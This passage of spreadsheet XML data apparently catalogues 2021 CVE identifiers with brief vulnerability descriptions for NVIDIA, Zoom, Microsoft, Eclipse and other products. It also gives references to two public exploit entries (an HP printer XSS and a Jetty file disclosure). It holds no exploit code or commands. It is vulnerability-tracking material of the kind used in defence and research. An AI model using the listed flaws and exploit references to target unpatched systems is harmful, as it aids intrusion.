    <t>Bootloader contains a vulnerability in NVIDIA MB2 where a potential heap overflow might lead to denial of service or escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34384</t>
  </si>
  <si>
    <t>Bootloader contains a vulnerability in NVIDIA MB2 where a potential heap overflow could cause memory corruption, which might lead to denial of service or code execution.</t>
  </si>
  <si>
    <t>CVE-2021-34385</t>
  </si>
  <si>
    <t>Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where an integer overflow in the calculation of a length could lead to a heap overflow.</t>
  </si>
  <si>
    <t>CVE-2021-34386</t>
  </si>
  <si>
    <t>Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where an integer overflow in the calloc size calculation can cause the multiplication of count and size can overflow, which might lead to heap overflows.</t>
  </si>
  <si>
    <t>CVE-2021-34387</t>
  </si>
  <si>
    <t>The ARM TrustZone Technology on which Trusty is based on contains a vulnerability in access permission settings where the portion of the DRAM reserved for TrustZone is identity-mapped by TLK with read, write, and execute permissions, which gives write access to kernel code and data that is otherwise mapped read only.</t>
  </si>
  <si>
    <t>CVE-2021-34388</t>
  </si>
  <si>
    <t>Bootloader contains a vulnerability in NVIDIA TegraBoot where a potential heap overflow might allow an attacker to control all the RAM after the heap block, leading to denial of service or code execution.</t>
  </si>
  <si>
    <t>CVE-2021-34389</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in NVIDIA OTE protocol message parsing code, which is present in all the TAs. An incorrect bounds check can allow a local user through a malicious client to access memory from the heap in the TrustZone, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-34390</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in the NVIDIA TLK kernel function where a lack of checks allows the exploitation of an integer overflow through a specific SMC call that is triggered by the user, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34391</t>
  </si>
  <si>
    <t>CVE-2021-34392</t>
  </si>
  <si>
    <t>Trusty TLK contains a vulnerability in the NVIDIA TLK kernel where an integer overflow in the tz_map_shared_mem function can bypass boundary checks, which might lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34393</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in TSEC TA which deserializes the incoming messages even though the TSEC TA does not expose any command. This vulnerability might allow an attacker to exploit the deserializer to impact code execution, causing information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-34394</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in the NVIDIA OTE protocol that is present in all TAs. An incorrect message stream deserialization allows an attacker to use the malicious CA that is run by the user to cause the buffer overflow, which may lead to information disclosure and data modification.</t>
  </si>
  <si>
    <t>CVE-2021-34395</t>
  </si>
  <si>
    <t>Trusty TLK contains a vulnerability in its access permission settings where it does not properly restrict access to a resource from a user with local privileges, which might lead to limited information disclosure, a low risk of modifcations to data, and limited denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34396</t>
  </si>
  <si>
    <t>Bootloader contains a vulnerability in access permission settings where unauthorized software may be able to overwrite NVIDIA MB2 code, which would result in limited denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34397</t>
  </si>
  <si>
    <t>Bootloader contains a vulnerability in NVIDIA MB2, which may cause free-the-wrong-heap, which may lead to limited denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34398</t>
  </si>
  <si>
    <t>NVIDIA DCGM, all versions prior to 2.2.9, contains a vulnerability in the DIAG module where any user can inject shared libraries into the DCGM server, which is usually running as root, which may lead to privilege escalation, total loss of confidentiality and integrity, and complete denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34399</t>
  </si>
  <si>
    <t>NVIDIA GPU and Tegra hardware contain a vulnerability in the internal microcontroller which may allow a user with elevated privileges to gain access to information from unscrubbed registers, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-3440</t>
  </si>
  <si>
    <t>HP Print and Scan Doctor, an application within the HP Smart App for Windows, is potentially vulnerable to local elevation of privilege.</t>
  </si>
  <si>
    <t>CVE-2021-34400</t>
  </si>
  <si>
    <t>NVIDIA GPU and Tegra hardware contain a vulnerability in the internal microcontroller which may allow a user with elevated privileges to gain access to information from unscrubbed memory, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-34401</t>
  </si>
  <si>
    <t>NVIDIA Linux kernel distributions contain a vulnerability in nvmap NVGPU_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, where improper access control may lead to code execution, compromised integrity, or denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34402</t>
  </si>
  <si>
    <t>NVIDIA Tegra kernel driver contains a vulnerability in NVIDIA NVDEC, where a user with high privileges might be able to read from or write to a memory location that is outside the intended boundary of the buffer, which may lead to denial of service, Information disclosure, loss of Integrity, or possible escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34403</t>
  </si>
  <si>
    <t>NVIDIA Linux distributions contain a vulnerability in nvmap ioctl, which allows any user with a local account to exploit a use-after-free condition, leading to code privilege escalation, loss of confidentiality and integrity, or denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34404</t>
  </si>
  <si>
    <t>Android images for T210 provided by NVIDIA contain a vulnerability in BROM, where failure to limit access to AHB-DMA when BROM fails may allow an unprivileged attacker with physical access to cause denial of service or impact integrity and confidentiality beyond the security scope of BROM.</t>
  </si>
  <si>
    <t>CVE-2021-34405</t>
  </si>
  <si>
    <t>NVIDIA Linux distributions contain a vulnerability in TrustZoneâ€™s TEE_Malloc function, where an unchecked return value causing a null pointer dereference may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34406</t>
  </si>
  <si>
    <t>NVIDIA Tegra kernel driver contains a vulnerability in NVHost, where a specific race condition can lead to a null pointer dereference, which may lead to a system reboot.</t>
  </si>
  <si>
    <t>CVE-2021-34408</t>
  </si>
  <si>
    <t>The Zoom Client for Meetings for Windows in all versions before version 5.3.2 writes log files to a user writable directory as a privileged user during the installation or update of the client. This could allow for potential privilege escalation if a link was created between the user writable directory used and a non-user writable directory.</t>
  </si>
  <si>
    <t>CVE-2021-34409</t>
  </si>
  <si>
    <t>It was discovered that the installation packages of the Zoom Client for Meetings for MacOS (Standard and for IT Admin) installation before version 5.2.0, Zoom Client Plugin for Sharing iPhone/iPad before version 5.2.0, and Zoom Rooms for Conference before version 5.1.0, copy pre- and post- installation shell scripts to a user-writable directory. In the affected products listed below, a malicious actor with local access to a user's machine could use this flaw to potentially run arbitrary system commands in a higher privileged context during the installation process.</t>
  </si>
  <si>
    <t>CVE-2021-3441</t>
  </si>
  <si>
    <t>A potential security vulnerability has been identified for the HP OfficeJet 7110 Wide Format ePrinter that enables Cross-Site Scripting (XSS).</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/50227.py</t>
  </si>
  <si>
    <t>HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>2021-08-25</t>
  </si>
  <si>
    <t>CVE-2021-34410</t>
  </si>
  <si>
    <t>A user-writable application bundle unpacked during the install for all versions of the Zoom Plugin for Microsoft Outlook for Mac before 5.0.25611.0521 allows for privilege escalation to root.</t>
  </si>
  <si>
    <t>CVE-2021-34411</t>
  </si>
  <si>
    <t>During the installation process forZoom Rooms for Conference Room for Windows before version 5.3.0 it is possible to launch Internet Explorer with elevated privileges. If the installer was launched with elevated privileges such as by SCCM this can result in a local privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-34412</t>
  </si>
  <si>
    <t>During the installation process for all versions of the Zoom Client for Meetings for Windows before 5.4.0, it is possible to launch Internet Explorer. If the installer was launched with elevated privileges such as by SCCM this can result in a local privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-34413</t>
  </si>
  <si>
    <t>All versions of the Zoom Plugin for Microsoft Outlook for MacOS before 5.3.52553.0918 contain a Time-of-check Time-of-use (TOC/TOU) vulnerability during the plugin installation process. This could allow a standard user to write their own malicious application to the plugin directory, allowing the malicious application to execute in a privileged context.</t>
  </si>
  <si>
    <t>CVE-2021-34414</t>
  </si>
  <si>
    <t>The network proxy page on the web portal for the Zoom on-premise Meeting Connector Controller before version 4.6.348.20201217, Zoom on-premise Meeting Connector MMR before version 4.6.348.20201217, Zoom on-premise Recording Connector before version 3.8.42.20200905, Zoom on-premise Virtual Room Connector before version 4.4.6620.20201110, and Zoom on-premise Virtual Room Connector Load Balancer before version 2.5.5495.20210326 fails to validate input sent in requests to update the network proxy configuration, which could lead to remote command injection on the on-premise image by a web portal administrator.</t>
  </si>
  <si>
    <t>CVE-2021-34415</t>
  </si>
  <si>
    <t>The Zone Controller service in the Zoom On-Premise Meeting Connector Controller before version 4.6.358.20210205 does not verify the cnt field sent in incoming network packets, which leads to exhaustion of resources and system crash.</t>
  </si>
  <si>
    <t>CVE-2021-34416</t>
  </si>
  <si>
    <t>The network address administrative settings web portal for the Zoom on-premise Meeting Connector before version 4.6.360.20210325, Zoom on-premise Meeting Connector MMR before version 4.6.360.20210325, Zoom on-premise Recording Connector before version 3.8.44.20210326, Zoom on-premise Virtual Room Connector before version 4.4.6752.20210326, and Zoom on-premise Virtual Room Connector Load Balancer before version 2.5.5495.20210326 fails to validate input sent in requests to update the network configuration, which could lead to remote command injection on the on-premise image by the web portal administrators.</t>
  </si>
  <si>
    <t>CVE-2021-34417</t>
  </si>
  <si>
    <t>The network proxy page on the web portal for the Zoom On-Premise Meeting Connector Controller before version 4.6.365.20210703, Zoom On-Premise Meeting Connector MMR before version 4.6.365.20210703, Zoom On-Premise Recording Connector before version 3.8.45.20210703, Zoom On-Premise Virtual Room Connector before version 4.4.6868.20210703, and Zoom On-Premise Virtual Room Connector Load Balancer before version 2.5.5496.20210703 fails to validate input sent in requests to set the network proxy password. This could lead to remote command injection by a web portal administrator.</t>
  </si>
  <si>
    <t>CVE-2021-34418</t>
  </si>
  <si>
    <t>The login routine of the web console in the Zoom On-Premise Meeting Connector before version 4.6.239.20200613, Zoom On-Premise Meeting Connector MMR before version 4.6.239.20200613, Zoom On-Premise Recording Connector before version 3.8.42.20200905, Zoom On-Premise Virtual Room Connector before version 4.4.6344.20200612, and Zoom On-Premise Virtual Room Connector Load Balancer before version 2.5.5492.20200616 fails to validate that a NULL byte was sent while authenticating. This could lead to a crash of the login service.</t>
  </si>
  <si>
    <t>CVE-2021-34419</t>
  </si>
  <si>
    <t>In the Zoom Client for Meetings for Ubuntu Linux before version 5.1.0, there is an HTML injection flaw when sending a remote control request to a user in the process of in-meeting screen sharing. This could allow meeting participants to be targeted for social engineering attacks.</t>
  </si>
  <si>
    <t>CVE-2021-3442</t>
  </si>
  <si>
    <t>A flaw was found in the Red Hat OpenShift API Management product. User input is not validated allowing an authenticated user to inject scripts into some text boxes leading to a XSS attack. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>exploits/java/webapps/50478.txt</t>
  </si>
  <si>
    <t>Eclipse Jetty 11.0.5 - Sensitive File Disclosure</t>
  </si>
  <si>
    <t>CVE-2021-34420</t>
  </si>
  <si>
    <t>The Zoom Client for Meetings for Windows installer before version 5.5.4 does not properly verify the signature of files with .msi, .ps1, and .bat extensions. This could lead to a malicious actor installing malicious software on a customer’s computer.</t>
  </si>
  <si>
    <t>CVE-2021-34421</t>
  </si>
  <si>
    <t>The Keybase Client for Android before version 5.8.0 and the Keybase Client for iOS before version 5.8.0 fails to properly remove exploded messages initiated by a user if the receiving user places the chat session in the background while the sending user explodes the messages. This could lead to disclosure of sensitive information which was meant to be deleted from the customer's device.</t>
  </si>
  <si>
    <t>CVE-2021-34422</t>
  </si>
  <si>
    <t>The Keybase Client for Windows before version 5.7.0 contains a path traversal vulnerability when checking the name of a file uploaded to a team folder. A malicious user could upload a file to a shared folder with a specially crafted file name which could allow a user to execute an application which was not intended on their host machine. If a malicious user leveraged this issue with the public folder sharing feature of the Keybase client, this could lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-34423</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability was discovered in Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4, Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1, Zoom Client for Meetings for intune (for Android and iOS) before version 5.8.4, Zoom Client for Meetings for Chrome OS before version 5.0.1, Zoom Rooms for Conference Room (for Android, AndroidBali, macOS, and Windows) before version 5.8.3, Controllers for Zoom Rooms (for Android, iOS, and Windows) before version 5.8.3, Zoom VDI Windows Meeting Client before version 5.8.4, Zoom VDI Azure Virtual Desktop Plugins (for Windows x86 or x64, IGEL x64, Ubuntu x64, HP ThinPro OS x64) before version 5.8.4.21112, Zoom VDI Citrix Plugins (for Windows x86 or x64, Mac Universal Installer &amp; Uninstaller, IGEL x64, eLux RP6 x64, HP ThinPro OS x64, Ubuntu x64, CentOS x 64, Dell ThinOS) before version 5.8.4.21112, Zoom VDI VMware Plugins (for Windows x86 or x64, Mac Universal Installer &amp; Uninstaller, IGEL x64, eLux RP6 x64, HP ThinPro OS x64, Ubuntu x64, CentOS x 64, Dell ThinOS) before version 5.8.4.21112, Zoom Meeting SDK for Android before version 5.7.6.1922, Zoom Meeting SDK for iOS before version 5.7.6.1082, Zoom Meeting SDK for macOS before version 5.7.6.1340, Zoom Meeting SDK for Windows before version 5.7.6.1081, Zoom Video SDK (for Android, iOS, macOS, and Windows) before version 1.1.2, Zoom On-Premise Meeting Connector Controller before version 4.8.12.20211115, Zoom On-Premise Meeting Connector MMR before version 4.8.12.20211115, Zoom On-Premise Recording Connector before version 5.1.0.65.20211116, Zoom On-Premise Virtual Room Connector before version 4.4.7266.20211117, Zoom On-Premise Virtual Room Connector Load Balancer before version 2.5.5692.20211117, Zoom Hybrid Zproxy before version 1.0.1058.20211116, and Zoom Hybrid MMR before version 4.6.20211116.131_x86-64. This can potentially allow a malicious actor to crash the service or application, or leverage this vulnerability to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-34424</t>
  </si>
  <si>
    <t>A vulnerability was discovered in the Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4, Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1, Zoom Client for Meetings for intune (for Android and iOS) before version 5.8.4, Zoom Client for Meetings for Chrome OS before version 5.0.1, Zoom Rooms for Conference Room (for Android, AndroidBali, macOS, and Windows) before version 5.8.3, Controllers for Zoom Rooms (for Android, iOS, and Windows) before version 5.8.3, Zoom VDI Windows Meeting Client before version 5.8.4, Zoom VDI Azure Virtual Desktop Plugins (for Windows x86 or x64, IGEL x64, Ubuntu x64, HP ThinPro OS x64) before version 5.8.4.21112, Zoom VDI Citrix Plugins (for Windows x86 or x64, Mac Universal Installer &amp; Uninstaller, IGEL x64, eLux RP6 x64, HP ThinPro OS x64, Ubuntu x64, CentOS x 64, Dell ThinOS) before version 5.8.4.21112, Zoom VDI VMware Plugins (for Windows x86 or x64, Mac Universal Installer &amp; Uninstaller, IGEL x64, eLux RP6 x64, HP ThinPro OS x64, Ubuntu x64, CentOS x 64, Dell ThinOS) before version 5.8.4.21112, Zoom Meeting SDK for Android before version 5.7.6.1922, Zoom Meeting SDK for iOS before version 5.7.6.1082, Zoom Meeting SDK for macOS before version 5.7.6.1340, Zoom Meeting SDK for Windows before version 5.7.6.1081, Zoom Video SDK (for Android, iOS, macOS, and Windows) before version 1.1.2, Zoom on-premise Meeting Connector before version 4.8.12.20211115, Zoom on-premise Meeting Connector MMR before version 4.8.12.20211115, Zoom on-premise Recording Connector before version 5.1.0.65.20211116, Zoom on-premise Virtual Room Connector before version 4.4.7266.20211117, Zoom on-premise Virtual Room Connector Load Balancer before version 2.5.5692.20211117, Zoom Hybrid Zproxy before version 1.0.1058.20211116, and Zoom Hybrid MMR before version 4.6.20211116.131_x86-64 which potentially allowed for the exposure of the state of process memory. This issue could be used to potentially gain insight into arbitrary areas of the product's memory.</t>
  </si>
  <si>
    <t>CVE-2021-34425</t>
  </si>
  <si>
    <t>The Zoom Client for Meetings before version 5.7.3 (for Android, iOS, Linux, macOS, and Windows) contain a server side request forgery vulnerability in the chat\'s "link preview" functionality. In versions prior to 5.7.3, if a user were to enable the chat\'s "link preview" feature, a malicious actor could trick the user into potentially sending arbitrary HTTP GET requests to URLs that the actor cannot reach directly.</t>
  </si>
  <si>
    <t>CVE-2021-34426</t>
  </si>
  <si>
    <t>A vulnerability was discovered in the Keybase Client for Windows before version 5.6.0 when a user executed the "keybase git lfs-config" command on the command-line. In versions prior to 5.6.0, a malicious actor with write access to a user\'s Git repository could leverage this vulnerability to potentially execute arbitrary Windows commands on a user\'s local system.</t>
  </si>
  <si>
    <t>CVE-2021-34427</t>
  </si>
  <si>
    <t>In Eclipse BIRT versions 4.8.0 and earlier, an attacker can use query parameters to create a JSP file which is accessible from remote (current BIRT viewer dir) to inject JSP code into the running instance.</t>
  </si>
  <si>
    <t>CVE-2021-34428</t>
  </si>
  <si>
    <t>For Eclipse Jetty versions &lt;= 9.4.40, &lt;= 10.0.2, &lt;= 11.0.2, if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in.</t>
  </si>
  <si>
    <t>CVE-2021-34429</t>
  </si>
  <si>
    <t>For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 &amp; 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.</t>
  </si>
  <si>
    <t>CVE-2021-3443</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in the way Jasper versions before 2.0.27 handled component references in the JP2 image format decoder. A specially crafted JP2 image file could cause an application using the Jasper library to crash when opened.</t>
  </si>
  <si>
    <t>CVE-2021-34430</t>
  </si>
  <si>
    <t>Eclipse TinyDTLS through 0.9-rc1 relies on the rand function in the C library, which makes it easier for remote attackers to compute the master key and then decrypt DTLS traffic.</t>
  </si>
  <si>
    <t>CVE-2021-34431</t>
  </si>
  <si>
    <t>In Eclipse Mosquitto version 1.6 to 2.0.10, if an authenticated client that had connected with MQTT v5 sent a crafted CONNECT message to the broker a memory leak would occur, which could be used to provide a DoS attack against the broker.</t>
  </si>
  <si>
    <t>CVE-2021-34432</t>
  </si>
  <si>
    <t>In Eclipse Mosquitto versions 2.07 and earlier, the server will crash if the client tries to send a PUBLISH packet with topic length = 0.</t>
  </si>
  <si>
    <t>CVE-2021-34433</t>
  </si>
  <si>
    <t>In Eclipse Californium version 2.0.0 to 2.6.4 and 3.0.0-M1 to 3.0.0-M3, the certificate based (x509 and RPK) DTLS handshakes accidentally succeeds without verifying the server side's signature on the client side, if that signature is not included in the server's ServerKeyExchange.</t>
  </si>
  <si>
    <t>CVE-2021-34434</t>
  </si>
  <si>
    <t>In Eclipse Mosquitto versions 2.0 to 2.0.11, when using the dynamic security plugin, if the ability for a client to make subscriptions on a topic is revoked when a durable client is offline, then existing subscriptions for that client are not revoked.</t>
  </si>
  <si>
    <t>CVE-2021-34435</t>
  </si>
  <si>
    <t>In Eclipse Theia 0.3.9 to 1.8.1, the "mini-browser" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file..</t>
  </si>
  <si>
    <t>CVE-2021-34436</t>
  </si>
  <si>
    <t>In Eclipse Theia 0.1.1 to 0.2.0, it is possible to exploit the default build to obtain remote code execution (and XXE) via the theia-xml-extension. This extension uses lsp4xml (recently renamed to LemMinX) in order to provide language support for XML. This is installed by default.</t>
  </si>
  <si>
    <t>CVE-2021-34438</t>
  </si>
  <si>
    <t>Windows Font Driver Host Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34439</t>
  </si>
  <si>
    <t>Microsoft Windows Media Foundation Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34441, CVE-2021-34503.</t>
  </si>
  <si>
    <t>CVE-2021-3444</t>
  </si>
  <si>
    <t>The bpf verifier in the Linux kernel did not properly handle mod32 destination register truncation when the source register was known to be 0. A local attacker with the ability to load bpf programs could use this gain out-of-bounds reads in kernel memory leading to information disclosure (kernel memory), and possibly out-of-bounds writes that could potentially lead to code execution. This issue was addressed in the upstream kernel in commit 9b00f1b78809 ("bpf: Fix truncation handling for mod32 dst reg wrt zero") and in Linux stable kernels 5.11.2, 5.10.19, and 5.4.101.</t>
  </si>
  <si>
    <t>CVE-2021-34440</t>
  </si>
  <si>
    <t>GDI+ Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34441</t>
  </si>
  <si>
    <t>Microsoft Windows Media Foundation Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34439, CVE-2021-34503.</t>
  </si>
  <si>
    <t>CVE-2021-34442</t>
  </si>
  <si>
    <t>Windows DNS Server Denial of Service Vulnerability This CVE ID is unique from CVE-2021-33745, CVE-2021-34444, CVE-2021-34499.</t>
  </si>
  <si>
    <t>CVE-2021-34444</t>
  </si>
  <si>
    <t>Windows DNS Server Denial of Service Vulnerability This CVE ID is unique from CVE-2021-33745, CVE-2021-34442, CVE-2021-34499.</t>
  </si>
  <si>
    <t>CVE-2021-34445</t>
  </si>
  <si>
    <t>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33761, CVE-2021-33773, CVE-2021-34456.</t>
  </si>
  <si>
    <t>CVE-2021-34446</t>
  </si>
  <si>
    <t>Windows HTML Platforms Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34447</t>
  </si>
  <si>
    <t>Windows MSHTML Platform Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34497.</t>
  </si>
  <si>
    <t>CVE-2021-34448</t>
  </si>
  <si>
    <t>CVE-2021-34449</t>
  </si>
  <si>
    <t>Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-34516.</t>
  </si>
  <si>
    <t>CVE-2021-3445</t>
  </si>
  <si>
    <t>A flaw was found in libdnf's signature verification functionality in versions before 0.60.1. This flaw allows an attacker to achieve code execution if they can alter the header information of an RPM package and then trick a user or system into installing it. The highest risk of this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-34450</t>
  </si>
  <si>
    <t>Windows Hyper-V Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34451</t>
  </si>
  <si>
    <t>Microsoft Office Online Server Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34452</t>
  </si>
  <si>
    <t>Microsoft Word Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34453</t>
  </si>
  <si>
    <t>CVE-2021-34454</t>
  </si>
  <si>
    <t>Windows Remote Access Connection Manager Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-33763, CVE-2021-34457.</t>
  </si>
  <si>
    <t>CVE-2021-34455</t>
  </si>
  <si>
    <t>Windows File History Service Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34456</t>
  </si>
  <si>
    <t>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33761, CVE-2021-33773, CVE-2021-34445.</t>
  </si>
  <si>
    <t>CVE-2021-34457</t>
  </si>
  <si>
    <t>Windows Remote Access Connection Manager Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-33763, CVE-2021-34454.</t>
  </si>
  <si>
    <t>CVE-2021-34458</t>
  </si>
  <si>
    <t>Windows Kernel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34508.</t>
  </si>
  <si>
    <t>CVE-2021-34459</t>
  </si>
  <si>
    <t>Windows AppContainer Elevation Of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3446</t>
  </si>
  <si>
    <t>A flaw was found in libtpms in versions before 0.8.2. The commonly used integration of libtpms with OpenSSL contained a vulnerability related to the returned IV (initialization vector) when certain symmetric ciphers were used. Instead of returning the last IV it returned the initial IV to the caller, thus weakening the subsequent encryption and decryption steps. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-34460</t>
  </si>
  <si>
    <t>Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33751, CVE-2021-34510, CVE-2021-34512, CVE-2021-34513.</t>
  </si>
  <si>
    <t>CVE-2021-34461</t>
  </si>
  <si>
    <t>CVE-2021-34462</t>
  </si>
  <si>
    <t>Windows AppX Deployment Extensions Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34464</t>
  </si>
  <si>
    <t>Microsoft Defender Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34522.</t>
  </si>
  <si>
    <t>CVE-2021-34466</t>
  </si>
  <si>
    <t>Windows Hello Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34467</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34468, CVE-2021-34520.</t>
  </si>
  <si>
    <t>CVE-2021-34468</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34467, CVE-2021-34520.</t>
  </si>
  <si>
    <t>CVE-2021-34469</t>
  </si>
  <si>
    <t>Microsoft Office Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3447</t>
  </si>
  <si>
    <t>A flaw was found in several ansible modules, where parameters containing credentials, such as secrets, were being logged in plain-text on managed nodes, as well as being made visible on the controller node when run in verbose mode. These parameters were not protected by the no_log feature. An attacker can take advantage of this information to steal those credentials, provided when they have access to the log files containing them. The highest threat from this vulnerability is to data confidentiality. This flaw affects Red Hat Ansible Automation Platform in versions before 1.2.2 and Ansible Tower in versions before 3.8.2.</t>
  </si>
  <si>
    <t>CVE-2021-34470</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34523.</t>
  </si>
  <si>
    <t>CVE-2021-34471</t>
  </si>
  <si>
    <t>Microsoft Windows Defender Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34473</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.</t>
  </si>
  <si>
    <t>CVE-2021-34474</t>
  </si>
  <si>
    <t>Dynamics Business Central Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34476</t>
  </si>
  <si>
    <t>Bowser.sys Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34477</t>
  </si>
  <si>
    <t>Visual Studio Code .NET Runtime Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34478</t>
  </si>
  <si>
    <t>Microsoft Office Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34479</t>
  </si>
  <si>
    <t>Microsoft Visual Studio Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3448</t>
  </si>
  <si>
    <t>A flaw was found in dnsmasq in versions before 2.85. When configured to use a specific server for a given network interface, dnsmasq uses a fixed port while forwarding queries. An attacker on the network, able to find the outgoing port used by dnsmasq, only needs to guess the random transmission ID to forge a reply and get it accepted by dnsmasq. This flaw makes a DNS Cache Poisoning attack much easier. The highest threat from this vulnerability is to data integrity.</t>
  </si>
  <si>
    <t>CVE-2021-34480</t>
  </si>
  <si>
    <t>CVE-2021-34481</t>
  </si>
  <si>
    <t>Windows Print Spooler Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34483</t>
  </si>
  <si>
    <t>CVE-2021-34484</t>
  </si>
  <si>
    <t>Windows User Profile Service Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34485</t>
  </si>
  <si>
    <t>.NET Core and Visual Studio Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34486</t>
  </si>
  <si>
    <t>Windows Event Tracing Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26425, CVE-2021-34487.</t>
  </si>
  <si>
    <t>CVE-2021-34487</t>
  </si>
  <si>
    <t>Windows Event Tracing Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26425, CVE-2021-34486.</t>
  </si>
  <si>
    <t>CVE-2021-34488</t>
  </si>
  <si>
    <t>Windows Console Driver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34489</t>
  </si>
  <si>
    <t>DirectWrite Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3449</t>
  </si>
  <si>
    <t>An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).</t>
  </si>
  <si>
    <t>CVE-2021-34490</t>
  </si>
  <si>
    <t>Windows TCP/IP Driver Denial of Service Vulnerability This CVE ID is unique from CVE-2021-31183, CVE-2021-33772.</t>
  </si>
  <si>
    <t>CVE-2021-34491</t>
  </si>
  <si>
    <t>CVE-2021-34492</t>
  </si>
  <si>
